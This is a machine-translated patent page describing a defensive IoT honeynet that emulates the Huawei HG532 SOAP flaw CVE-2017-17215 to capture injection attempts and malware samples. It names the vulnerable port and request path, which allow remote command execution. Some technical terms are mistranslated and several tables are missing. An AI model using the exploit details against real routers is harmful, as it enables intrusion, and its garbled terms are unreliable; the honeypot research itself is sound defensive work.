CN110391937B - An IoT Honeynet System Based on SOAP Service Simulation - Google Patents

Abstract

Translated fromChinese

一种基于SOAP服务模拟的物联网蜜网系统，属于物联网安全技术领域。本发明的目的是为了监测收集物联网的安全状态，并捕获黑客针对物联网的恶意请求，收集恶意样本。本发明根据一个路由器SOAP服务漏洞CVE‑2017‑17215设计了一种中高交互蜜罐；为了防止黑客利用模拟服务未完成的服务细节进行注入，导致模拟服务蜜罐无法响应从而不能捕获后续恶意代码和样本，使用带有漏洞的设备固件实现了提供真实SOAP服务的蜜罐补充模拟服务蜜罐的功能；为了对更多类型的SOAP攻击进行捕获，针对2018年暴露最多的SOAP端口进行分析并制作了相应的多端口蜜罐。通过将这些蜜罐部署到多个节点，同时设计控制中心进行命令的分发和文件的传输，辅以Docker技术封装实现快速部署。黑客无法通过SOAP服务漏洞来控制物联网设备，提高物联网的安全性。

An IoT honeynet system based on SOAP service simulation belongs to the technical field of IoT security. The purpose of the present invention is to monitor and collect the security state of the Internet of Things, capture malicious requests of hackers for the Internet of Things, and collect malicious samples. The present invention designs a medium-high interaction honeypot according to a router SOAP service vulnerability CVE‑2017‑17215; in order to prevent hackers from using the unfinished service details of the simulated service to inject, the simulated service honeypot cannot respond and thus cannot capture subsequent malicious code and The sample uses the device firmware with vulnerabilities to implement a honeypot that provides real SOAP services to supplement the function of a simulated service honeypot; in order to capture more types of SOAP attacks, the most exposed SOAP ports in 2018 were analyzed and produced. The corresponding multi-port honeypot. By deploying these honeypots to multiple nodes, and designing a control center for command distribution and file transmission, rapid deployment is achieved with Docker technology encapsulation. Hackers cannot control IoT devices through SOAP service vulnerabilities, improving the security of IoT.

Description

Internet of things honey net system based on SOAP service simulation

Technical Field

The invention relates to an Internet of things honeynet system based on SOAP service simulation, and belongs to the technical field of Internet of things safety.

Background

In recent years, with the demand of people for intelligent life, the internet of things industry is rapidly developed. According to investigation, the scale of the equipment of the Internet of things breaks through the billions. Although the huge quantity of internet of things equipment can greatly improve the living environment of people, huge potential safety hazards are hidden. Meanwhile, the internet of things equipment is difficult to deploy conventional network security measures due to the characteristics of limited equipment resources, various operating system architectures and the like, and is easy to attack. On one hand, a hacker can steal information or perform malicious attack by using the internet of things equipment, such as invading a camera to acquire videos, controlling the on-off of intelligent equipment and the like; on the other hand, an attacker writes malicious software to infect the Internet of things equipment by using the vulnerability of the Internet of things, and the attacker poses serious threats to the information and property safety of countries, enterprises and individuals. Obviously, the internet of things becomes a new excavation place for hackers, and people must pay attention to the safety of the internet of things to discover and eliminate potential safety hazards in time.

In order to protect the safety of the Internet of things, malicious behaviors of the Internet of things need to be monitored, and threats are discovered in time. We need to know what the malicious behavior is, what the data has what characteristics, what the attack type and the characteristics are. The method requires that a malicious sample of the internet of things is obtained firstly, and the honeypot technology is the best method for capturing the malicious request and collecting the malicious sample. The Internet of things equipment follows a UPnP architecture and is controlled through a SOAP protocol, so that a plurality of hackers control the Internet of things equipment through SOAP service loopholes and the safety of the Internet of things is damaged. However, in the prior art, a honey net system is developed for a traditional internet system and cannot be directly applied to the field of internet of things.

Disclosure of Invention

The technical problem to be solved by the invention is as follows:

the invention provides an Internet of things honey net system based on SOAP service simulation, which is used for monitoring and collecting the security state of the Internet of things, capturing malicious requests of hackers for the Internet of things and collecting malicious samples.

The technical scheme adopted by the invention for solving the technical problems is as follows:

an Internet of things honeynet system based on SOAP service simulation comprises three types of honeypots: a simulation SOAP service honeypot based on CVE-2017 and 17215 loopholes, a real SOAP service honeypot developed by equipment firmware with CVE-2017 and 17215 loopholes, a multi-port simulation SOAP service honeypot,

after each honeypot is packaged by a Docker, the honeypot network deploys honeypots to a plurality of physical nodes, 1-3 honeypots of different types are distributed on each physical node, each physical node (server) supports single honeypot deployment and also supports multi-honeypot deployment, and meanwhile, each physical node is also provided with a main control program for managing various honeypots on the physical node;

the control nodes manage and interact each physical node (honey net node), so that honeypots are combined into an integral honey net system by independent individuals;

because the simulation details of the simulation SOAP service honeypot are limited, when the simulation SOAP service honeypot receives a SOAP service request which cannot be analyzed and processed, the request is forwarded to a real SOAP service honeypot developed by equipment firmware with CVE-2017 and 17215 vulnerabilities for processing;

using the script to distribute and transmit the command of the file at the control node, acquiring the response message of the honeypot and recording the response message into an output log; the control script is designed by python multithreading, and a paramiko library is used for connecting the remote host of the ip list; the script is used for realizing the function of transmitting files, and the ssh key is used for connecting the host and executing a given command, so that the switching of the honeypot and the monitoring task of the host system are realized.

Further, the CVE-2017-enable 17215 bug in the simulated SOAP service honeypot based on the CVE-2017-enable 17215 bug refers to: HG532 series routers provide unsecure SOAP services for device upgrades, resulting in unauthorized access and remote code injection; sending a specially constructed request packet to an 37215 port monitored by the UPnP service of the router by using the loophole, and then remotely executing any command;

the CVE-2017-17215 vulnerability information is as follows:

the vulnerability occupation port is: 37215

The request path of the vulnerability is: xml/upnp (v.x.

/ctrlt/DeviceUpgrade_1

Infected device models include: b660, HG231f, HG531sV1, HG531V1, HG630, YAbox.

Further, the simulated SOAP service honeypot based on the CVE-2017-containing 17215 bug comprises four main modules which are a honeypot core module, honeypot daemon classes, honeypot daemon services and honeypot monitors respectively;

the honeypot core module, namely the pot _ core module, is a core service program of honeypot, is used for providing simulated loophole internet of things service, and comprises: a soap service module soap _ server, a web service module webhook, a log module log _ server, a malicious sample processing module samples _ deal,

the system comprises a SOAP service module, a SOAP server and a honey monitor, wherein the SOAP service module provides an external interface start _ homeypot function for the honey daemon class, the honey daemon service and the honey monitor, the function opens a log server and a SOAP server for monitoring, and a timer is set to call a timer _ handle _ log _ fun function of the log module log _ server; the SOAP service module SOAP _ server calls a handle defined in a web service module webhook and a make _ server function in a wsgiref, simple _ server library, and opens a SOAP server at a port 37215 to simulate a SOAP service with a bug of real Internet of things equipment, so as to attract a hacker to attack;

the log module log _ server defines a UDPHandler for monitoring request information sent by the soap service module soap _ server in json format, analyzing the request information and returning a message of successful log record; if the request finds malicious sample downloading, a wget _ virus _ in _ url function in a malicious sample processing module sample _ deal is called to download the samples, the log types in a log module log _ server are divided into get, post and other, and the log format is shown in the following table:

a handle function aiming at the soap vulnerability is defined in a web service module webhook, and a constructed false file is returned through wsgi; for the cve-2017-17215 vulnerability, the injection code accesses the 37215 port of the web service with a path of/ctrl/deviceupdate _1, and the banner information is shown in cve-2017-17215 vulnerability banner format table; a send _ log function is also defined in the part of the web service module webhook and is used for sending request records packaged into a json format to a log _ server; the web service module webhook uses the socket to communicate with the log server, waits for the returned message, retransmits if an error message is received, and considers that the server is down if the retransmission times exceed the limit;

cve-2017-17215 looper format is as follows:

the malicious sample processing module samples _ deal is responsible for downloading and processing the malicious sample; the wget _ virus _ in _ url function provides an interface for calling a sample downloading function for the outside; extracting the downloaded elements in the function through a regular expression; after the downloading resource information is extracted, calling a download _ virus _ by _ requests function to download a sample, firstly searching an output directory and a sample name by the function, and calling a renaming _ duplicate _ virus function to rename the sample after adding a suffix to the sample if the sample name exists; then, the function calls a requests library to download samples; if the sample is downloaded successfully, then a deep _ analyze function is further called to perform deep analysis, namely, the sample content is analyzed line by line to judge whether the condition of 'big horse under small horse' exists; the malicious sample processing module samples _ deal simultaneously defines a clear _ duplicate _ sample function, and the hash value of the sample is calculated by calling an md5sum function to realize the duplicate removal of the sample;

the functions of the parts cooperate with each other to jointly form a honey pot core, the most basic functions of the honey pot are completed, and real Internet of things equipment and services are simulated;

the honeypot Daemon class defines a honeypot Daemon base class Daemon and provides an interface for controlling honeypots through class instances; the method comprises the steps that a function daemonize in a honeypot Daemon class is used for initializing a Daemon instance, firstly, the weight is judged through pidfile, then a buffer area is refreshed, a standard stream is abandoned, and finally, the pidfile is removed when the process is guaranteed to be finished through an atexit. The static function __ sigterm _ handler throws a SystemExit exception; a start function calls a daemonize function to initialize, captures runtime exceptions and outputs error information; the stop function acquires a process number from the pidfile and calls the process number; the restart function continuously calls the stop function and the start function to complete the restart function;

the honeypot Daemon service defines a MyDaemon class and an inheritance Daemon class, and calls a core _ service.start _ honeypot function to start honeypot core service when an instance runs; in the main function, an instance similar to MyDaemon is created, and the start of the honeypot daemon process and the honeypot core are controlled through the start, stop and restart functions of the instance; a PotCore class is further defined in the code and used for providing an interface of a daemon process to the outside and calling a main function by calling a supprocess. The method comprises the following steps that a MyDaemon-like instance is not called directly but called a PotCore instance, and the PotCore instance calls the MyDaemon instance through a self method to realize indirect calling;

the honeypot monitor (pot _ monitor) calls a timer _ handle _ web _ detect _ fun function to complete the check of the honeypot function; the function regularly accesses the honeypot simulated service, detects the running state of the function, judges the abnormity such as overtime, connection error and the like, and calls a PotCore object to restart when the abnormity occurs.

Further, the simulation SOAP service honeypot based on the CVE-2017-17215 vulnerability further includes:

json is a honeypot configuration file that defines the following parameters: honeypot name, log output catalog, honeypot core, honeypot self-checking time delay and self-checking period;

sh calls a tc tool for limiting flow and preventing the honeypot from being attacked and then being used for DDOS attack; py, called main in this program, is the outermost entry to the honeypot.

Further, the use scenario of the real SOAP service honeypot developed by the device firmware with the CVE-2017-17215 bug is as follows:

when the request cannot be processed by the simulation protocol, an attacker cannot receive an expected response and is likely to break the connection, so that the honeypot cannot capture subsequent injection codes and malicious samples, and therefore a honeypot is developed by using completely real firmware of the vulnerable Internet of things to process the request which cannot be processed by the simulation honeypot;

the real SOAP service honeypot is used for assembling a kernel file vmlinux-2.6.32-5-4kc-malta and a disk image debo _ squeeze _ mips _ standard.qcow2 by using a qemu environment, and provides SOAP services which are completely the same as real vulnerability Internet of things equipment by using a chroma/root/squashfs-root/bin/sh command to switch a root directory and running upnp services and mic services after the real SOAP service honeypot is successfully started; the real SOAP service honeypot comprises a log module log _ server and a malicious sample processing module samples _ deal in the honeypot core module.

Further, the multi-port simulation SOAP service honeypot is developed according to a plurality of SOAP ports exposed most in 2018 IOT equipment, and the SOAP port information is as follows:

the function of the core module of the multi-port simulation SOAP service honeypot is consistent with that of the simulation SOAP service honeypot based on CVE-2017-17215 loopholes; the difference lies in that the multiport simulation SOAP service honeypot belongs to a multiport honeypot, and multithreading operation is realized by using a reading module in codes.

Further, the Docker encapsulation adopted by the honey net system comprises the following operations:

1) optimizing the base image: ubuntu16.04 is adopted as the basic image of the honeypot, and meanwhile, a python3.6 environment and a dependent package needed in codes are integrated, so that the downloading reduction rate of the image during packaging is prevented;

2) a tandem DockerFile instruction: a plurality of commands are connected in series to form a RUN command, the number of mirror layers is reduced, and unnecessary components are deleted to reduce space;

3) optimizing the service: mirror image cache is fully utilized, a fixed machine is used for socket build, and meanwhile, a constant large-volume dependence library and a frequently-modified self-owned code are separated;

4) run command optimization: when executing the apt command, a serial method is used for installing a plurality of commands simultaneously, and a-no-instruction-records parameter can be used for avoiding the dependence of installation advisability.

The invention has the following beneficial technical effects:

the invention designs a medium-high interaction honeypot according to a router SOAP service loophole CVE-2017-17215; in order to prevent hackers from injecting unfinished service details of the simulation service to cause that the simulation service honeypot cannot respond so as to capture subsequent malicious codes and samples, equipment firmware with holes is used for realizing the function of supplementing the simulation service honeypot with real SOAP service; in order to capture more types of SOAP attacks, the SOAP ports with the greatest exposure in 2018 are analyzed and corresponding multi-port honeypots are manufactured. The honeypots are deployed to a plurality of nodes, the control center is designed to distribute commands and transmit files, and the Docker technology is used for encapsulation to realize rapid deployment, so that the Internet of things honeynet system based on SOAP service simulation is realized. A hacker cannot control the Internet of things equipment through the SOAP service loophole, and the safety of the Internet of things is improved.

Drawings

FIG. 1 is a block diagram of a collaboration relationship of parts of a port _ core;

fig. 2 is a block diagram of the overall structure of an internet of things honey net system (composite honey net system architecture) based on SOAP service simulation.

Detailed Description

The implementation of the internet of things honey net system based on the SOAP service simulation according to the present invention is described below with reference to fig. 1-2 and tables as follows:

1. SOAP service simulation honeypot based on CVE-2017-containing 17215 bug

The HG532 family of routers provides unsecure SOAP services for device upgrades, resulting in unauthorized access and remote code injection. Any command can be executed remotely by sending a specially constructed request packet to the 37215 port that the router UPnP service listens to with this vulnerability.

The model of the internet of things equipment affected by the vulnerability and the configuration information thereof are shown in table 1:

TABLE 1 CVE-2017-17215 vulnerability information

The outermost layer of the overall structure of the honeypot is an intelligent guard framework which consists of four main modules, namely a honeypot core module, honeypot guard processes, honeypot guard process services and a honeypot monitor. The framework can ensure the stability of the honeypot operation process, timely discover and restart honeypot services when the honeypot services are abnormal, and meanwhile, log information which cannot be recorded by the honeypot services can be supplemented, so that problems of debugging and troubleshooting are assisted.

The function and implementation of the honeypot is described below in terms of modules.

Honey pot core module

The port _ core module is a core service program of the honeypot and provides simulated equipment and service of the Internet of things with the vulnerabilities. The system is further divided into a soap service module soap _ server, a web service module webhook, a log module log _ server and a malicious sample processing module samples _ deal. The relationship between the parts is shown in fig. 1.

The method comprises the steps that a core _ service.py provides an external interface start _ hometype function for modules except a port _ core, a log server and a SOAP server are opened to monitor, a timer is set to call a timer _ handle _ log _ fun function of the log _ server.py, the function calls the function in a recursion mode and detects the current time, and all stored logs are guaranteed to be output to a local directory every day.

log _ server.py defines a udphardler for monitoring request information sent by front-end soap _ server.py packaged into json format, analyzing the request information and returning a message that logging is successful. If a malicious sample download is found in the request, the wget _ video _ in _ url function in sample _ default. And meanwhile, the file also provides an interface function for starting a log server and outputting the log to the file at regular time for core _ service. The log types defined by this section are divided into get, post and other, and the log format is shown in table 2:

table 2 log format

And (5) calling a handle defined in webhook. py and a make _ server function in wsgiref. simple _ server, and starting a SOAP server at a port 37215 to simulate a loophole SOAP service of real Internet of things equipment so as to attract a hacker to attack.

Py defines a handler function for the soap vulnerability, returning the constructed dummy file through wsgi. For the cve-2017-17215 vulnerability, the injection code accessed the 37215 port of the web service with a path of/ctrl/deviceupgrad _1 and the banner information as shown in table 3. Also defined in this section is the send log function for sending request records packed in json format to log server. The part uses the socket to communicate with the log server, waits for the message returned by the log server, retransmits if an error message is received, and if the retransmission times exceed the limit, the server is considered to be down.

Py is responsible for the downloading and processing of malicious samples. Wherein the wget _ video _ in _ url function provides an interface for calling a sample download function to the outside. In the function, the downloaded elements are extracted by regular expressions.

And after the downloading resource information is extracted, calling a download _ virus _ by _ requests function to download the samples, firstly searching an output directory and sample names by the function, and calling a renaming _ duplicate _ virus function to rename the samples by adding suffixes to the samples if the sample names exist. Subsequently, the function calls the requests library for sample download. If the sample is downloaded successfully, the deep analysis is further carried out by calling the deply _ analyze function, namely, the sample content is analyzed line by line to judge whether the condition of 'big horse under small horse' exists. This section also defines the clear _ duplicate _ sample function to implement deduplication of a sample by calling the md5sum function to compute the hash value of the sample.

TABLE 3 cve-2017-17215 vulnerability banner Format

The SOAP XML folder stores SOAP equipment information given by imitating the router with the vulnerability, and the SOAP equipment information comprises information such as equipment type, equipment model, equipment website, uuid, service list, service address, serial number and the like of the equipment. This file is used to return real device configuration information in response to a SOAP service scan for the 37215 port.

The functions of the parts cooperate with each other to jointly form a honey pot core, the most basic functions of the honey pot are completed, and real Internet of things equipment and services are simulated.

Honeypot daemon class

The class defines a honeypot Daemon base class Daemon, has methods of starting, closing, restarting, initializing and the like, and provides an interface for controlling honeypots through class instances for the outside.

Since the Daemon class is a Daemon process that has detached itself from the terminal, the standard information flow is redirected to an empty file through the os.dup2 function. The pidfile attribute is defaulted to be "/tmp. pid", which is a file storing the process number of the current process, and whether the process exists can be known through the file, so that a singleton mode is ensured.

The function daemonidie is used for initializing a Daemon instance, firstly judging the weight by pidfile, then refreshing a buffer area, abandoning a standard stream, and finally ensuring that the pidfile is removed when the process is finished by a atexit. The static function __ sigterm _ handler throws the SystemExit exception. And the start function calls the daemonize function to initialize, captures runtime exception and outputs error information. The stop function gets the process number from the pidfile and kills it. And the restart function continuously calls the stop function and the start function to complete the restart function.

Honeypot daemon service

Py defines a class MyDaemon, inherits the Daemon class in the scar _ library, and calls a core _ service.start _ honeypot function to start the honeypot core service when the instance runs. In the main function, an instance similar to MyDaemon is created, and the start of the honeypot daemon and the honeypot core are controlled by the start, stop and restart functions of the instance. A class PotCore is also defined in the code for providing an interface of a daemon to the outside, and calling a main function by calling a supprocess. That is, the external part does not directly call the MyDaemon-like instance but calls the PotCore instance, and the PotCore instance calls the MyDaemon-like instance through a self method to realize indirect calling.

Honeypot monitor

The pot _ monitor calls the timer _ handle _ web _ detect _ fun function to complete the inspection of the honeypot function. The function regularly accesses the honeypot simulated service, detects the running state of the function, judges the abnormity such as overtime, connection error and the like, and calls a PotCore object to restart when the abnormity occurs. And also provides a start _ service interface for external calls.

Other modules

Json is a configuration file of honeypots, defines some parameters, and reduces the workload of secondary development. The method specifically comprises honeypot names, log output catalogs, honeypot cores, honeypot self-checking time delay, self-checking periods and the like.

Py is the entry to the whole honeypot framework, calls the start method of the PotCore class instance to start the daemon, and then calls the sef check start service function of the pot monitor to start the SOAP service self-check.

Sh calls tc tool to limit flow, and prevents honeypots from being used for DDOS attack after being attacked. Py, called main in this program, is the outermost entry to the honeypot.

2. SOAP service honeypot based on equipment firmware

The above-described medium-high interaction honeypot simulates the SOAP protocol based on wsgi, and when the simulation protocol cannot process a request, an attacker cannot receive an expected response, and is likely to break the connection, so that the honeypot cannot capture subsequent injected codes and malicious samples. Therefore, a high-interaction honeypot is developed by using completely real firmware of the internet of things with the bugs to process the requests which cannot be processed by the high-interaction simulation honeypot. Because of the integrity of its services, the captured malicious sample may also be actually run.

Assembling a kernel file vmlinux-2.6.32-5-4kc-malta and a disk image Debian _ squeeze _ mips _ standard. qcow2 by using a qemu environment, switching a root directory by using a chroma/root/squashfs-root/bin/sh command after successfully starting, and running an upnp service and a mic service so as to provide the SOAP service which is completely the same as the real equipment with the vulnerability of the Internet of things. The SOAP service honeypot based on the device firmware can be realized by adding the request recording and sample downloading module in the system.

3. SOAP service multi-port honeypot

Through the collection of the equipment information of the Internet of things, the information of a plurality of pieces of equipment banner of the Internet of things influenced by the vulnerability is obtained and is used for matching the equipment types so as to select the response content of the malicious request. The device information is shown in table 4.

Table 4 popular SOAP port device information

The design of the daemon framework and the module of the honeypot core are similar to those of the honeypot cve-2017-17215, and are not repeated here. The difference is that the honeypot belongs to a multi-port honeypot, so that a reading module is used in the code to realize multi-thread running. After the operation, any port can return to the configuration file of the Internet of things equipment according to given fingerprint information, and the simulation of real equipment service is realized.

4. Honeypot Docker encapsulation

After the honeypot service is realized, in order to facilitate rapid deployment and transplantation and prevent malicious behaviors after the honeypot is broken, the honeypot needs to be virtualized and transplanted, and is packaged into a black box which is easy to use and deploy.

Docker is a technology for packaging applications, and mainly comprises mirror images, containers and warehouses. An image is a file that can be recognized by the Docker engine and contains the basic contents of a container, and an image can contain an operating system and specific environments, applications and the like required by a developer. The container is a mirror image after operation. The repository is used to store the image.

The use of Docker has several advantages:

(1) the honeypots are packaged into Docker mirror images, the contents of operating systems, program dependency packages, simulation services and the like of the honeypots can be packaged into a black box, the environment does not need to be set up during transplantation, and only Docker needs to be installed for deployment. Due to the existence of the warehouse, the transmission time can be saved even, each node automatically pulls the honeypot mirror image from the warehouse, and multiple nodes work simultaneously, so that the rapid deployment of the honeypot network system is realized.

(2) In the actual application of honeypots, the situation that honeypots are broken by hackers often occurs. Once this happens, not only will we lose control of the machine, but hackers will exploit the machine for malicious behavior. Therefore, some security measures are necessary for the honeypot, so that a hacker cannot break the honeypot or cannot further control our host even if the hacker breaks the honeypot. In order to prevent hackers from breaking the honeypots, the high-medium interaction honeypots are adopted, the experimental process is simulated, requests are received and responses are given only under the control range of the hackers, and the interactivity of the honeypots is reduced, so that specific balance is needed. And the use of the container technology ensures the safety of the host, and even if a hacker breaks through the honeypot, the container is only one container under the physical machine and is isolated from the resources of the physical machine. The container can be reset and restored at any time.

(3) Because the container is a light-weight technology, the occupied system resources are less, and the utilization rate of the host resources can be greatly improved. Through the container technology, a plurality of honeypot instances can be deployed on a single host, and the flexibility is high.

In the mirror image packaging process, the mirror image needs to be simplified in consideration of the requirement of rapid deployment. The method specifically comprises the following points:

1. the base image is optimized. The ubuntu16.04 is adopted as the basic image of the honeypot, and meanwhile, a python3.6 environment and some packages needed in the code are integrated, so that the downloading of the image is prevented from reducing the speed in packaging.

2. A tandem DockerFile instruction. A plurality of commands are connected in series to form a RUN command, the number of mirror layers is reduced, and unnecessary components are deleted to reduce space.

3. And optimizing the service. Mirror image cache is fully utilized, a fixed machine is used for socket build, and meanwhile, a constant large-size dependence base and self-owned codes which are frequently modified are separated.

Run command optimization. When executing the apt command, a serial method is used for installing a plurality of commands simultaneously, and a-no-instruction-records parameter can be used for avoiding the dependence of installation advisability.

5. Honeypot architecture design

After the honeypots are packaged, the honeypots need to be deployed on a physical machine, and management and interaction of honeynet nodes are performed by using control nodes, so that the honeypots are combined into an integral honeynet system by independent individuals. The whole structure of the internet of things honey net designed by the invention is shown in figure 2.

The honeypot network system deploys honeypots to a plurality of physical nodes, each physical machine supports single honeypot deployment and multi-honeypot deployment, and meanwhile, the honeypot network system is provided with a main control program for managing honeypots on the physical machine. When the high-interaction honeypot in the CVE cannot analyze the external request, the request is sent to the main control node, and the main control node informs the high-interaction honeypot running the real firmware to respond.

In order to enable the honeypot system to have coordination and increase the capability of cluster deployment, a control center is designed. And the script is used for distributing and transmitting the file and the command in the control center, and the response message of the honeypot is obtained and recorded into an output log. The control script uses python multithreading to connect to the remote host of the ip list using the paramiko library. The script can realize the function of transmitting files, and can also utilize ssh keys to connect the host and execute given commands to realize the tasks of opening and closing honeypots, monitoring a host system and the like.

The technical effects of the present invention are explained as follows:

by simulating SOAP services and utilizing real firmware, the small-scale internet of things honey net can monitor SOAP injection attacks, record logs and automatically download malicious samples. The test environment is as follows:

TABLE 5 test environment

The honeypot functional tests are shown in table 6, for example. The function test proves that the honeypot of the Internet of things can perfectly simulate and realize real equipment service of the Internet of things, can process unknown requests, also realizes the functions of self-checking and restarting, has certain fault-tolerant capability and robustness, and provides a reliable bottom environment for the system.

TABLE 6 honeypot test case

Watch 6 (continuation watch)

Honeypots deployed in USA and Canada ran steadily in one week and collected much attack data as shown in table 7.

TABLE 7 sample Server information

A total of 332 different IPs were observed to scan and inject honeypots. There are 9 ip found in the records of suspected sample download centers or C2 servers, respectively from different countries, and in addition to these ip, honeypots additionally capture a threat domain name cnc.

The honeypot analyzes the malicious request to obtain the address of the sample server and downloads a plurality of malicious samples of the Internet of things from the servers, and the samples are not recorded by VT during capturing, so that the honeypot has the capability of capturing the latest threat of the Internet of things and has high scientific research and engineering values.

The specific malicious sample information is shown in table 8:

TABLE 8 malicious sample of Internet of things captured by honeypot

Claims (5)

1. An Internet of things honeynet system based on SOAP service simulation is characterized by comprising three types of honeypots: a simulation SOAP service honeypot based on CVE-2017 and 17215 loopholes, a real SOAP service honeypot developed by equipment firmware with CVE-2017 and 17215 loopholes, a multi-port simulation SOAP service honeypot,

after each honeypot is packaged by a Docker, the honeypot network deploys the honeypots to a plurality of physical nodes, 1-3 honeypots of different types are arranged on each physical node, each physical node supports single honeypot deployment and also supports multi-honeypot deployment, and meanwhile, each physical node is also provided with a main control program for managing various honeypots on the physical node;

managing and interacting each physical node through the control node, so that honeypots are combined into an integral honeynet system by independent individuals;

because the simulation details of the simulation SOAP service honeypot are limited, when the simulation SOAP service honeypot receives a SOAP service request which cannot be analyzed and processed, the request is forwarded to a real SOAP service honeypot developed by equipment firmware with CVE-2017 and 17215 vulnerabilities for processing;

using the script to distribute and transmit the command of the file at the control node, acquiring the response message of the honeypot and recording the response message into an output log; the control script is designed by python multithreading, and a paramiko library is used for connecting the remote host of the ip list; the script is used for realizing the function of transmitting files, and the ssh key is used for connecting the host and executing a given command to realize the tasks of opening and closing the honeypot and monitoring the host system;

the CVE-2017-: HG532 series routers provide unsecure SOAP services for device upgrades, resulting in unauthorized access and remote code injection; sending a specially constructed request packet to an 37215 port monitored by the UPnP service of the router by using the loophole, and then remotely executing any command;

the CVE-2017-17215 vulnerability information is as follows:

the vulnerability occupation port is: 37215

The request path of the vulnerability is: xml/upnp (v.x.

/ctrlt/DeviceUpgrade_1

Infected device models include: b660, HG231f, HG531sV1, HG531V1, HG630, YAbox;

the simulation SOAP service honeypot based on the CVE-2017-one 17215 bug comprises four main modules which are a honeypot core module, honeypot daemon classes, honeypot daemon services and honeypot monitors respectively;

the honeypot core module, namely the pot _ core module, is a core service program of honeypot, is used for providing simulated loophole internet of things service, and comprises: a soap service module soap _ server, a web service module webhook, a log module log _ server, a malicious sample processing module samples _ deal,

the system comprises a SOAP service module, a SOAP server and a honey monitor, wherein the SOAP service module provides an external interface start _ homeypot function for the honey daemon class, the honey daemon service and the honey monitor, the function opens a log server and a SOAP server for monitoring, and a timer is set to call a timer _ handle _ log _ fun function of the log module log _ server; the SOAP service module SOAP _ server calls a handle defined in a web service module webhook and a make _ server function in a wsgiref, simple _ server library, and opens a SOAP server at a port 37215 to simulate a SOAP service with a bug of real Internet of things equipment, so as to attract a hacker to attack;

the log module log _ server defines a UDPHandler for monitoring request information sent by the soap service module soap _ server in json format, analyzing the request information and returning a message of successful log record; if the request finds malicious sample downloading, a wget _ virus _ in _ url function in a malicious sample processing module sample _ deal is called to download the samples, the log types in a log module log _ server are divided into get, post and other, and the log format is shown in the following table:

a handle function aiming at the soap vulnerability is defined in a web service module webhook, and a constructed false file is returned through wsgi; for the cve-2017-17215 vulnerability, the injection code accesses the 37215 port of the web service with a path of/ctrl/deviceupdate _1, and the banner information is shown in cve-2017-17215 vulnerability banner format table; a send _ log function is also defined in the part of the web service module webhook and is used for sending request records packaged into a json format to a log _ server; the web service module webhook uses the socket to communicate with the log server, waits for the returned message, retransmits if an error message is received, and considers that the server is down if the retransmission times exceed the limit;

cve-2017-17215 looper format is as follows:

the malicious sample processing module samples _ deal is responsible for downloading and processing the malicious sample; the wget _ virus _ in _ url function provides an interface for calling a sample downloading function for the outside; extracting the downloaded elements in the function through a regular expression; after the downloading resource information is extracted, calling a download _ virus _ by _ requests function to download a sample, firstly searching an output directory and a sample name by the function, and calling a renaming _ duplicate _ virus function to rename the sample after adding a suffix to the sample if the sample name exists; then, the function calls a requests library to download samples; if the sample is downloaded successfully, then a deep _ analyze function is further called to perform deep analysis, namely, the sample content is analyzed line by line to judge whether the condition of 'big horse under small horse' exists; the malicious sample processing module samples _ deal simultaneously defines a clear _ duplicate _ sample function, and the hash value of the sample is calculated by calling an md5sum function to realize the duplicate removal of the sample;

the functions of the parts cooperate with each other to jointly form a honey pot core, the most basic functions of the honey pot are completed, and real Internet of things equipment and services are simulated;

the honeypot Daemon class defines a honeypot Daemon base class Daemon and provides an interface for controlling honeypots through class instances; the method comprises the steps that a function daemonize in a honeypot Daemon class is used for initializing a Daemon instance, firstly, the weight is judged through pidfile, then a buffer area is refreshed, a standard stream is abandoned, and finally, the pidfile is removed when the process is guaranteed to be finished through an atexit. The static function __ sigterm _ handler throws a SystemExit exception; a start function calls a daemonize function to initialize, captures runtime exceptions and outputs error information; the stop function acquires a process number from the pidfile and calls the process number; the restart function continuously calls the stop function and the start function to complete the restart function;

the honeypot Daemon service defines a MyDaemon class and an inheritance Daemon class, and calls a core _ service.start _ honeypot function to start honeypot core service when an instance runs; in the main function, an instance similar to MyDaemon is created, and the start of the honeypot daemon process and the honeypot core are controlled through the start, stop and restart functions of the instance; a PotCore class is further defined in the code and used for providing an interface of a daemon process to the outside and calling a main function by calling a supprocess. The method comprises the following steps that a MyDaemon-like instance is not called directly but called a PotCore instance, and the PotCore instance calls the MyDaemon instance through a self method to realize indirect calling;

the honeypot monitor, wherein the honeypot monitor pot _ monitor calls a timer _ handle _ web _ detect _ fun function to complete the check of the honeypot function; the function regularly accesses the honeypot simulated service, detects the running state of the function, judges the abnormity such as overtime, connection error and the like, and calls a PotCore object to restart when the abnormity occurs.

2. The IOT honeynet system as claimed in claim 1, wherein the simulated SOAP service honeypot based on CVE-2017-17215 loopholes further comprises:

json is a honeypot configuration file that defines the following parameters: honeypot name, log output catalog, honeypot core, honeypot self-checking time delay and self-checking period;

sh calls a tc tool for limiting flow and preventing the honeypot from being attacked and then being used for DDOS attack; py, called main in this program, is the outermost entry to the honeypot.

3. The internet of things honey net system based on SOAP service simulation as claimed in claim 1, wherein the usage scenarios of the real SOAP service honey pot developed by the device firmware with CVE-2017 and 17215 bugs are as follows:

when the request cannot be processed by the simulation protocol, an attacker cannot receive an expected response and is likely to break the connection, so that the honeypot cannot capture subsequent injection codes and malicious samples, and therefore a honeypot is developed by using completely real firmware of the vulnerable Internet of things to process the request which cannot be processed by the simulation honeypot;

the real SOAP service honeypot is used for assembling a kernel file vmlinux-2.6.32-5-4kc-malta and a disk image debo _ squeeze _ mips _ standard.qcow2 by using a qemu environment, and provides SOAP services which are completely the same as real vulnerability Internet of things equipment by using a chroma/root/squashfs-root/bin/sh command to switch a root directory and running upnp services and mic services after the real SOAP service honeypot is successfully started; the real SOAP service honeypot comprises a log module log _ server and a malicious sample processing module samples _ deal in the honeypot core module.

4. The IOT honeynet system based on SOAP service simulation as claimed in claim 3, wherein the multi-port simulation SOAP service honeypot is developed according to the SOAP ports exposed most in the IOT equipment in 2018, and the SOAP port information is as follows:

the function of the core module of the multi-port simulation SOAP service honeypot is consistent with that of the simulation SOAP service honeypot based on CVE-2017-17215 loopholes; the difference lies in that the multiport simulation SOAP service honeypot belongs to a multiport honeypot, and multithreading operation is realized by using a reading module in codes.

5. The Internet of things honey net system based on SOAP service simulation as claimed in claim 4, wherein Docker encapsulation adopted by the honey net system comprises the following operations:

1) optimizing the base image: ubuntu16.04 is adopted as the basic image of the honeypot, and meanwhile, a python3.6 environment and a dependent package needed in codes are integrated, so that the downloading reduction rate of the image during packaging is prevented;

2) a tandem DockerFile instruction: a plurality of commands are connected in series to form a RUN command, the number of mirror layers is reduced, and unnecessary components are deleted to reduce space;

